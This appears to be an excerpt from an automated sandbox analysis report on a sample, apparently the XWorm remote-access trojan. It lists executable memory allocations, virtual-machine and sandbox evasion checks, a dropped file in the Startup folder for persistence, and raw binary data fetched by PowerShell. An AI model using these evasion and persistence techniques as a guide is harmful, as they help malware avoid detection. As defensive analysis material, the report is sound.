NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06253000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06254000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02519000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04942000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04943000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02204000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02204000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02224000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02224000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00180000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d80000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 18, 2023, 7:44 a.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Sept. 18, 2023, 7:44 a.m.	total_number_of_free_bytes: 9934761984 free_bytes_available: 9934761984 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe

Executes one or more WMI queries (1 event)

wmi	Select * from Win32_ComputerSystem

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (9 events)

Time & API	Arguments	Status	Return
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: mobsync.exe process_identifier: 2032	1	1
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: pw.exe process_identifier: 1700	1	1
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: taskhost.exe process_identifier: 872	1	1
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: SearchProtocolHost.exe process_identifier: 1740	1	1
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: cmd.exe process_identifier: 1608	1	1
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: conhost.exe process_identifier: 1132	1	1
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: SearchFilterHost.exe process_identifier: 1440	1	1
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: pw.exe process_identifier: 2052	1	1
Process32NextW Sept. 18, 2023, 7:44 a.m.	snapshot_handle: 0x00000118 process_name: Archevod_XWorm.exe process_identifier: 2292	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 18, 2023, 7:44 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received	zØ~¶¼öâûÈå?ZSA~åESdÍ £$çÃê4FÝõÈý31Ç5R#íÚp¬ÀuF^Ê¢Mú+MúVª#ßUð×c¿kU#õá\|®_¯l+KaH^'Å,¢å0&?ö äð´S40Jy\|5ÜjÓcmöëK÷²»lÇïÍ:ÿÇ¹UÝ+lI2XÆÏ ¯»Xý©púéÒ=ãé«Mò<RðÜ_5Eù° n ígqfg9M]]ÜweÄÁrYå&¢ðæë?Ð{Ô$q¨OP1[v©3TZ+þÀKNì°3®ñ÷ÞD»!¿XÿÝÜ°ë1# @ã¡Ù?w;?^¦S9/¹ùçê«÷vÝÌÝ>K/zK:²Ó§+ååBý£À ñwÎ¾-dÄô!7tpÆmud´GCaìSðt«§d¸Õ¶Q÷³\±~ÿ÷CcZdóøÍÆl²Á´gdNG÷d@Ê^kÄÙÒÏÕ»+>iz}ÀxZZæsSß/l'áòFîcÀ~ØÄ©w@ú¦êÆj±Ø¨¬Z$°&.OÀkßá}Òl`+·\|ë³)Âñ7-åÚrR;)qJ¾¹X°YaÒß! ¹HÌ%ÛÚ»Ê)jûÿà>^1úr ÚAÐJV3VÎ`ÞÄççvnô4"o¹;_·$A¯¯N¢ÓxpLìq8iú ºâE× \|Õü¾ÔÊkìo4ÂûVØÛ¨jå'"îÈÇ"·HÊà¶ØµÊ¶¦è?½íÜq~(íX{CÓÒÎðC)uDÄæª%ªäÅðs1Û}$ËxpIÌà#¦N=Ëmýªz\|ïÑ¾À{®tjKõ?Ù3kFj¯¥GÒñNOø;VÈÇñØbÑ1ýëXe\|Êõ{(¯¸ ÿ¶¶ÇÜ/5Kª;ÞÎOÅ+WD¿¡Óái1¼¦ÜÓfæÈÐásÙÔ»p¥Øo:æmÁ½84¸GôÄIjµ¿BÝ\u¶f\ ãOPjýÞë±+ØÁÿº\áÑ`¡¤~_÷L3âk[MË¯I¯!IÃ[å>S¼»Ø8ÊÖSø`BJ¢Z½êèËÍ$}Â±Ûv]B£tÖE fÙ®ï]¤úøÇwÆ® ¤\|íÀ¨Dæ·iüüÞ¬3`V`ý¾'x8"9ü°¥ë?/¨û/A Àû¦ÔËNPÆzÓßQ¤æÒ>PÉÁàQ[:ÇªøyôWà?,!·l#ºa¦Ü[£[.øÞ¦(º(µ #s9wýHSjvÌ8[¨¹$t;mÀÿ\|$ë·AF¬Ñ.Is&?ylÒS=Q"gÇKÒu[a¾¶¼DdD4õVÿÒÛ!Ôu mãMe¶1hMcÞwvê·Kå!að}Y:7).³%O×$Ê³ÍUqtÚÆ¹RÌn¼,þ½ºÝ®a³«H±CÌfË·fÅmÐHË\|Üîs¯ ù I£æc¨ø¥#CxÆ}K÷´ OÕ ªû¥áÅþ¼² mtyÛk¹:÷Ûþ5Äûs¥Í@D@98SHÍmãÖ?u¿¹ýH½Û'IsPÏ/¶ßÅa¦Q#NêC¡6ö\|ºÆÞôÌlü FJ÷8mTzmÅhÅ[+·óõmàcªRA<lÛr'èú_PöSüéÈ^Ôþ0O- óâÝêñLNÚx¢nï-}Mü ÂS#ûð?Ý±ì2I²á·²MH¡Ù}4ïÁà4zåt_W§Ûq,ú¿1¥²BÍø½3Dcx4f¤ Ýüåä7·I:¡í"+¡æ µ· ¸ïtCÀ/AC¿/Âx ûZw~å<¯!£fpSVÝ^+3Ë5¥äÎ³;¤}2nß.þÄcôO×K'Ù®ófµNí©¦»T¿þpú8Ààæo L¶pÓÂÑÛÿÓ4Ôb,ÐùÔGä°1õÔ;B±FAdËñÁ£´3@ï»HrrF¿`"GÝ>t¾<¨NÞ"ß7(@¥h[8Ý$÷9ÎÊ\÷¦záÇIÕ¬«;Sd"x c>ÿ+A-¥ÇÖÄhÄ{Ï{aûaßtå-å0vÈOOímñv$BÈ(akÇÃDñ@NaÞ«D²½lÓé±grþÊ \|¸Õy¶v¡A¶(?ýÍ"hCãë3féZE §Í¨PÝoCuááøØÒþhQ» âCÃðµ÷<çÜÉ}oÊ"tèGÉªÏfÜ=wHá0Õî9 À@3ë(À0æ³IGîÂîÇhgÃJQ]ò@Ð/ßJÁ[êÚ¤¼ÆÍ!?4k±vl\»3%Ïºø)ÂÞ½o}!ü,°KËJ9xºè`F$ké¼ÇÚùÓF~vH³µ¼%N[,ãûÃ¿¸,d9²qÃ-¯-%sbEX½æôþÏº3ýå>g îTJÞàé÷±èîýr:©7üä³íº\|²Ø{Nè¤h¼,Ô¬°ZélK«¶ÒGx7R\¢tÙ¹n>laª"®Ë¶¨5×Ü»W¥o³ØÖ§¨âI1v#úLÎN¬j]HRsßo·e %õ6N»§x·OÈåxIâPU/â»ªp_ l£ä¥ÓhP5´uA·ÿd>¤¨ øöÔ?IðM"9EHæO½\2õ2Q>Ã@6ï¯käkêÛS äùûß¹NÝvÝPeèmÙe\¶¥-HX,3)>Ò¹ð{¥e.?uSdQ³ñ: È¼ØH`S%ö¡¬^qmfÛ97Ñ0×8?4éËÔRZ#ÊòCò<WèSîÊPæ£ÎFíj·._èÆtî¥/ãÅlóA¦üÅ ÏYmï"øn¿Ô°&}NÍÜ¾µçÊ¥UrâÔm«@:}²²Õ¶ÕW5÷ûÛ" Õ°9[sqd±Ùá%gDX¼æ_}9qí¬´?ZbÑlÖ©/$d¢½yr]ª9ü ÄãJI?åÛù]ÇûÕáL©@@aSáÈ§W]ËX°/#¼ÂªaOÚËx£ÀüÞ´×¨ÀÌñØ2\|÷\|xn²Øé°3Z+X+N®c¶Íúxõj¢/c,õ¸:ÎÙ9ò`;VüÛ¿FZ&Ye'¡t^pc»þÀ6®Ã¦¡O¡èïZaWÖñ;¨æ¾¶.è¶NH ñá¢yKß3ç]¹0¬FUNõ$'I£É#?UD<,`°@-¼zÃ%©åaã¸±oZÔÿ!m¶-^+8dß ÒË:£ÅZÈÖ,²ÊÑúZ!{5QDÎÚÀKð© 9Ë³f`ÞGûAòjå«xÞo\|\|PQ8½«Ëâóþ0êbÛVoF¿ äÞ3Ô<ôMdFn( l}R1{ø}éèK¯ÿõ2¢,¾vtí3áÅA¿Êuì¡?°(±\ÖþÌüÍ,Íµó ²¼´J §;P¾@McéØÞ-õChHö±ôãzfÛ£w,f£(.ÍUNïØOde8åð¥ÃÅ³sédÊÿðØhyf6cnÐÝèÞ²d ,^°8Îßu&uÁÚª)n¢5Ë Óþ2åcÕ_;åqLj/ÒznºÔ©6¯Øú/H=@»Â.ÛÀ~ãúRíâAñÈÅã{[}.~¿ä/BKTk ¡¸ðÕ@Ð9t/#±+k_cý§5R-¾â3Õ¥òÈdð0[&}ï@uêDü;üÅ¹ôç®dRºéyÙOcuiÁîGö}Î\|$b°( .tú&ùèâ¥) Y)¶dÕë'e¬»å0Ó¿BJÒnMyÍÁ×§/æÅÄxÚyé {Dô7ö$ßVhj]ýÈe«<ý~¤`³½&aª¨/øt¡³ÿáQé]jº_÷Þ,ÖÇò ©Jèã=Ãi¼XÍR,E®ÜLÍÂ'´vøÌÕ<1êÈµv 7ä³dþ=ÄÐô0Oü~âeêÕS¸GNh:HJãWdoÄxq=Vmètur?ß¥îÔu÷3åÖ#ñ
Data received	T¿ÏåOÉ©R aGq:nÒÅ`FØOz4>p=Â\LÏIM»FÝ}³^ð0²,a.³´§ÎMÙÅ{ví;8yàÛWù>BT$ÕÕxJÀM²'bëÄäþ¡BøEå÷åÖQsuGÆ1y0- ×«Âäfö·<(¹&fÊt>ÙåðÂ¬l3j«jÞË °0·öî1®NzSÁZUzÆÖ}°Ù»ý ."£¡ìU¤Äß··E´!0x#¿ ÚôçpXðýHªÓ·ØúñÃCÊ5®g4GúÇx'UÜ2 .nÕB¶Náÿ³òRbÎ²¼£Zí ÌÕpÒ7¾ã_:cÿ×dÇÕ¯¿M!Hp9a[M(BqÔ;¶º"¤Y©ÍRó&ør ß ÄåaOÂBÒÊÃ¡^>b·é#L I©¤x£¡~WM£@Â}AógÑÍn¿ÀÐ¶ TÿèÖ~C}¡¦Õýÿ2{ô üû(DUAçèX¹êkN+DTãT6ýC/7:°¢áÙ, ¹£EðÉ¦L(¯¾á×vÏ¯N£f>ØµIZÍZö=$<X#GÑ]2/4ïsf\Í4'ôXZÏñÇ\|láIxM{F-¾ïw½¬@Åe°PUW-¶ãËº¡ïn6±{ßqÅýAú]odºðÁs!k] 7OÉÓË«ÎûÿQS.µûÖ©Vûþh¬JLX.,¶÷$§èºqêNÝrK´àÎYa¢I` &ò©½J~sÁÐxjdGÐ8²$õ¬Ll)¹,}ª;(N©HVN\|hhÜµË0~#Ô&4$ãö:í oxu Q0;çkðu·ï$dóáÞÁúaop»l9«×i.¾[ºQ@»xãr@Á¬pÏ)ñØ/^THnÙuAm3¨ Ë-¥Õ<áùxë-)ûP%çäM¯i+8Q»ÿã¯¢i=¼}ý3½mX X¨çÌP¶+²Jä_öX`ôaû#H'bý@=jU_5àñB7¨{Fºp©;#ÞPÃVt¾`-VÃ[v6¤ß<¤V¥#æ?&É°äòy9OÜxÃ:M7²£½2íuÃ.¶¤~Òj}áÂðÈXDXe¼ÓLÓp}³òÆ¡Ù 7÷Ð3EÖ1äH!É.I"ÓhmlÖÑZÁ§·íÂ)©9×9þÜUõ«<P¥åàE)@¼ír·d±nÏÿJTÎëÎcá{õ'ÝÿöÈ]'~ë dõ³÷åÓëêÐÍickà0§l[°+Å5ëa·¦C>'ÁÞÞnS0øÓµg°Rz{Pââ?SßnÔß¾#ü¸iá-î7nSâ07zî-w' â.\Ñör©×%¾d¼-xÃ½06oê2¸LLÿåºåÇù¥·p ãõ;ÂÑß¥]On/åäAjÎÞ- fz{R½nIÕÛ%)ù}ªXÅRÈÆ¤)kyrWzSwYojêýÄÖcïØ©ê©s5rulû8z¥c$>Ûæ`Xë_¥óVÔ<"·z½f@+ùæà©°N>L¶Pòèø"«YàñYè!vÒgnÁø×U5pý5Hqm°BÀú¶ûå¨UyªÎ.¬áöWôM!\Ð\|£n£/dµ}6úÅëí0f®9JL§Xâñ®u÷w!ùCV¼Ë¿N0û;Ûæ°ÿ%w¦fÀÅ°Nðj²/;Gô\|I,2n«³¼ (]Â·¸¦øwxkérowÁ'òú59h(´Mcí©³f¡·CcØKSJ\áX2¶'Èª÷b¸pN)>xô¾2ÁÓâdxiÆÄ^Ìå5!U¢ÔÊ"l(ÙMÖC²rî¨ÆºÆkÉ«°8Rþ>ÇU´Ezî+¦1ì9;EW/\Àu öÇ¨¾§'!Ùü¥0ºnáJoÌ÷é0.xÀâUEt¶¤!.\ÛÐ®3IoøÞVéè}BL.8¾sòì=Ï&!3f²%C¢-e:dKK&ÁcO`q,:1×·WÞ0øøxû$d¹K;âÅ×a±æUU6BV ¹ÝõvÙê\Xöóôò»3[óR¶ òwyôÊxº `Q?déÖZóÔxâBé3¬Câç#ZIGåóéðXCWÌx®Ûh)ýÆ[Ç,¯nõ'êË©«"àùÖ=ûÅ0HF¢«ßyªY<tË ´ú¿&P´Ø2,äu¥Ý2=Wî¹á Í!ÒDÚÉR8!{A\|"Pg¡É¨¸¤ÇK4dõÄÎïgÛâÎø-Ð\|Jù$äÔ~ßÔ¾Ó_åÍZ¨iîa"£ãs#7lÜ8Þ!e9òÛâ§ÙÂû°ÌÏÍÜd÷DHöôék3/·ÿqõ ßÝÈ+&YÚ¶¨ÆùXQ¯¡¿ùTág¸)Ø>Egj.áÉ+Ð¶nPTp,-ô èuöíøt/ù@c¾"\;Ó>è½þk¤ä<Ånk[MÙÄKs]&}>¶â C½3²æ4¯±¤Àxèz72Øüã2SörûWmuæ¼OÙ"1=ÃÎ¯ t¡¤ÃG&å"ì{õB8×9åÌ®LÈHo.þT~wÃvôç.øÃ9ãwûBË6j ¤/À_Nä U»n-Hùî7æ-{>Ë\£íÞ+ä¤ZY2°zÙxKÓõ±¬Å¢+²!§j{tµÏ:·)3âµ¼Ý½àr'ÓÇ\|PNz8KgLb.x5(iâ'yú]ñ JÓ>N}_sèNÞùÝEô´±¨ôÁq±ÅòÎú¹Þ9I±:%vR0ðßAõê+2½ö<9ißäoÌ Ì^Êôð÷~ O]'!OéB.¹hò°U©:¥2XÚp,±à ór»ß#¨kPÚó 1ðp/¥é(ä»ëÀ-?$ç£ÍLøeB6Îäµà+\|¡È°Ù'oÀ<"á.'J£·dx>o(Uþq±£o£Cû"Ê7h¡&ÍJÀÜÎPS2Û^m#úu¥ªÄ'ä:s+tp$Ö$¹c[^÷³b¬jìÚ¹(D®UuâKû÷#³¯²ãÊ9\|Æ"üH 9{zdL ¤iúBÚ¬·^Fjß.5x&ÚI2\|,rzqÏQ%Ì.dÆ¶©»HõÒLÉI¾"¹üÒv0h(K½b 85ËýæÃÁPè¬mÿS$w¢ú> ÖåW0#³Ê=Êöæ¦)ò.vaéºèÏT2µwOY¥æà8ö²¸¼¨M¯Ü ³8MãU°Î¶ä{'W^Ãê&XËü¦4ïÞó8£Õ¾»»WÎY[®¯íÑr7möª.«õÇ©M÷<5$Ä^öMU{áÏÚ_û)ßÔ_sbM1Ç:óW¿8.ÔÜë¸Íï¢îÄù´j5øßôWÄL"Ý]àäóÝÍHêa¶¡¹\1ÄôU£û³nÓ6#Ò`jËt§ Çoäa¬Õr§¾1}<Ñ±]¨¶zêSi@¶öÖMÎ:oC÷nîÐC_ï>JRd!¤Ð`¸\¿;«¦,hÎìH98nùàÝ{<³Â÷Ë0`¹j§²GWE¼ÍüõÙùøÝ·1}-$âSùï&hâ/$:1ESâÆLEMGx¥³Äc»¬,DiaVñ(ñÞ0#2ò¨¾nàÔÄhrzþà:Þa5pw0Y¦²ðÿÊ {¼àyÀ¯Ûá½ÖU¯yí¢="þá bÓñïðs¼Ê}HKío%\|ZÆíùº§yñ3Îº-r¥£Õ\åW2ìÌFHr®w§v¼\Ä:8üyJQüN ¦ÝhÆ<l98BÑ@·î÷\-32j T"U»áÖTÃ&øPjz2S!ãÔ³âgîÁ®:ø¹Î%37c4«í8\|¦Lª!ùÓÆ³y=£8ºµA+Í~EçÌjYîÞ ÷:sME^õ"ñùbttNuêèýLøñÓN9 Å8,l>÷È[ÖN·ÅücXV¶ªî¾Ñb [X¾ÔoL&»¤qóýÝ;è->Uç-? ôn+0ÉÔì?ÙK}µµ>S4Iu ¸£¬¹øW§(l8ÈIÄ1gwËù*Ã¿ZXIxPÏÜË°; ¦d_;ÿ¤n;k+ôcY·ÌTù~«E%ü åâú²£s¶ß°Bf&oùTVätl©ó)ó³>ZÕt®mÆj_\|%)D[XÆ'=½äd1bò2ÆÆ°°Òz'Û¹ 9cÞð!4[Æ<[¾{ó¡Ei.ÎnV1 «©oXXQ ÝæTXïö#.Íë%ö×§ÏX¾£`ÄYykîl-Þ>u íW´f^E"Ç¸ç°XH 2
